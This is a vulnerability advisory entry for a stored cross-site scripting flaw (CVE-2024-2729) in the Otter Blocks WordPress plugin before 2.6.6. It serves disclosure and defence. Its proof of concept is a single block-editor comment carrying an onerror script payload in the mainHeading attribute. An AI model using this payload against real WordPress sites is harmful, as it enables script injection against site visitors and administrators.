Otter Blocks < 2.6.6 – Contributor+ Stored XSS | CVE 2024-2729 | Plugin Vulnerabilities

Description

The plugin does not properly escape its mainHeadings blocks' attribute before appending it to the final rendered block, allowing contributors to conduct Stored XSS attacks.

Proof of Concept

As a contributor, put the following payload in a post while in Code Editor mode

<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-b973b49a","title":"123","mainHeading":"img src=x onerror=alert(1) style=width:150px;","className":""} /-->

The XSS will be triggered when viewing/prevewing the post

Affects Plugins

Fixed in 2.6.6

References

CVE

URL

https://research.cleantalk.org/cve-2024-2729/

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Dmitrii Ignatyev

Submitter

Dmitrii Ignatyev

Submitter website

https://research.cleantalk.org

Verified

Yes

WPVDB ID

5014f886-020e-49d1-96a5-2159eed8ba14

Timeline

Publicly Published

2024-03-28 (about 1 year ago)

Added

2024-03-28 (about 1 year ago)

Last Updated

2024-04-01 (about 1 year ago)

Other

Published

Title

Published

2021-09-09

Title

OSD Subscribe <= 1.2.3 - Reflected Cross-Site Scripting

Published

2025-09-30

Title

Opal Service <= 1.9.1 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2025-02-03

Title

Orbit Fox by ThemeIsle < 2.10.45 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2022-09-08

Title

Export Post Info < 1.2.0 - Admin+ Stored Cross-Site Scripting

Published

2025-04-11

Title

Mobile Pages <= 1.0.2 - Reflected Cross-Site Scripting